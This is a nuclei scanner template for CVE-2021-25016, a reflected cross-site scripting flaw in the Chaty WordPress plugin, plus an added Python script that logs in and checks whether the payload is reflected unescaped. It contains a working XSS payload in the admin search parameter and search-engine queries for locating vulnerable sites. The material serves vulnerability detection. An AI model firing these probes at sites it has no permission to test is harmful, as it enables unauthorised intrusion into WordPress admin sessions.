id: CVE-2021-25016

info:
  name: Chaty < 2.8.3 - Cross-Site Scripting
  author: luisfelipe146
  severity: medium
  description: |
    The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
  impact: |
    An unauthenticated attacker can craft a link to the plugin's admin dashboard that reflects JavaScript from the search parameter. The script runs in the browser of the logged-in WordPress user (typically an administrator) who opens the link, with that user's privileges: it can read and change chat configuration or perform other admin actions on their behalf. WordPress authentication cookies are HttpOnly by default, so the realistic impact is abuse of the victim's session rather than cookie theft.
  remediation: Update Chaty to 2.8.3 or later and Chaty Pro to 2.8.2 or later.
  reference:
    - https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25016
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25016
    cwe-id: CWE-79
    epss-score: 0.15671
    epss-percentile: 0.94886
    cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: premio
    product: chaty
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/chaty/
    fofa-query: body=/wp-content/plugins/chaty/
    publicwww-query: "/wp-content/plugins/chaty/"
  tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio,vuln

http:
  - raw:
      # Request 1: authenticate. {{username}} and {{password}} must be supplied
      # at scan time (nuclei -var username=... -var password=...); the vulnerable
      # page lives under wp-admin and is only rendered for a logged-in user.
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      # Request 2: hit the Chaty contact-form feed page with the XSS payload
      # (</script><img src onerror=alert(document.domain)>) in the search parameter.
      - |
        GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
        Host: {{Hostname}}

    # The auth cookies set by request 1 must be carried into request 2. Nuclei v3
    # reuses cookies between raw requests by default; v2 needs this flag.
    cookie-reuse: true

    matchers-condition: and
    matchers:
      # Note: these words only prove that the Chaty admin page rendered with a
      # search form. They do not prove the payload came back unescaped, so a
      # patched install that escapes the parameter still matches. Confirm a hit
      # by checking that the raw <img ... onerror=...> appears in the response.
      - type: word
        part: body
        words:
          - "search="
          - "chaty_page_chaty"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009b42790e3f28fbd5c4a2ae752cd5ed22287aec6fb64188b07f8c556edb1032bf0221009f031b7960e1bb3900f7484995c9778138b4b297ae56f95c3be7e5181f14ecec:922c64590222798bb761d5b6d8e72950
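The template's body matcher only confirms that the Chaty admin page rendered with a search form; it cannot tell a reflected-unescaped payload from an entity-encoded one. The script below, an added example that is not part of the nuclei template or of the Chaty plugin, reproduces the template's two requests with a shared cookie jar and then classifies the response. It assumes a stock WordPress login form (fields `log`, `pwd`, `wp-submit`, exactly as the template posts them) and uses constructed HTML samples, not captures from a real install, to show why the word matcher alone matches both the vulnerable and the patched case.

```python
"""Confirm a CVE-2021-25016 hit: is the search payload reflected *unescaped*?

Added example; not code from the nuclei template or the Chaty plugin.
The HTML samples below are constructed. The login/probe flow assumes a
stock WordPress wp-login.php form (log, pwd, wp-submit), as the template does.
"""
import html
import http.cookiejar
import urllib.parse
import urllib.request

# Same payload the template sends: close any open <script> block, then inject an
# <img> whose onerror handler fires because src is empty.
PAYLOAD = "</script><img src onerror=alert(document.domain)>"
ADMIN_PAGE = "/wp-admin/admin.php?page=chaty-contact-form-feed"


def build_probe_url(base_url: str) -> str:
    """URL of the template's second request. quote_plus with safe="" produces the
    same %XX / '+' encoding the template uses ('/' must not stay unencoded)."""
    return base_url.rstrip("/") + ADMIN_PAGE + "&search=" + urllib.parse.quote_plus(PAYLOAD, safe="")


def template_word_matcher(body: str) -> bool:
    """The template's body matcher: both words present, nothing more. It fires
    whether or not the payload survived escaping."""
    return "search=" in body and "chaty_page_chaty" in body


def classify_reflection(body: str, payload: str = PAYLOAD) -> str:
    """'vulnerable' if the raw payload is echoed; 'escaped' if only an
    HTML-entity-encoded copy is (esc_html/esc_attr was applied, so the template
    hit is a false positive); 'not-reflected' otherwise."""
    if payload in body:
        return "vulnerable"
    if html.escape(payload) in body:
        return "escaped"
    return "not-reflected"


def fetch_admin_page(base_url: str, username: str, password: str, timeout: int = 15) -> str:
    """Replay the template's two requests through one cookie jar (the nuclei
    equivalent is cookie reuse between the raw requests)."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    login_form = urllib.parse.urlencode(
        {"log": username, "pwd": password, "wp-submit": "Log In"}
    ).encode()
    with opener.open(base_url.rstrip("/") + "/wp-login.php", data=login_form, timeout=timeout):
        pass  # wp-login.php answers with a 302 that carries the auth cookies
    with opener.open(build_probe_url(base_url), timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def verify(base_url: str, username: str, password: str) -> dict:
    """Live check: what the template's matcher says versus what reflection shows."""
    body = fetch_admin_page(base_url, username, password)
    return {"matcher": template_word_matcher(body), "reflection": classify_reflection(body)}


# Constructed responses (not captured from a real Chaty install). Both satisfy
# the template's word matcher; only the first is actually exploitable.
_PAGE = (
    '<body class="wp-admin chaty_page_chaty-contact-form-feed">'
    "<h2>Search results for: {echo}</h2>"
    '<a href="admin.php?page=chaty-contact-form-feed&search=">Clear</a>'
    "</body>"
)
SAMPLE_UNESCAPED = _PAGE.format(echo=PAYLOAD)
SAMPLE_ESCAPED = _PAGE.format(echo=html.escape(PAYLOAD))

if __name__ == "__main__":
    import sys

    if len(sys.argv) == 4:  # python3 check.py https://target.example admin 'pass'
        print(verify(sys.argv[1], sys.argv[2], sys.argv[3]))
    else:
        for name, body in (("unescaped", SAMPLE_UNESCAPED), ("escaped", SAMPLE_ESCAPED)):
            print(name, template_word_matcher(body), classify_reflection(body))
```

Run it against the constructed samples (no arguments) to see the matcher return True for both while `classify_reflection` separates them; pass a base URL and credentials to replay the check against a host you are authorised to test.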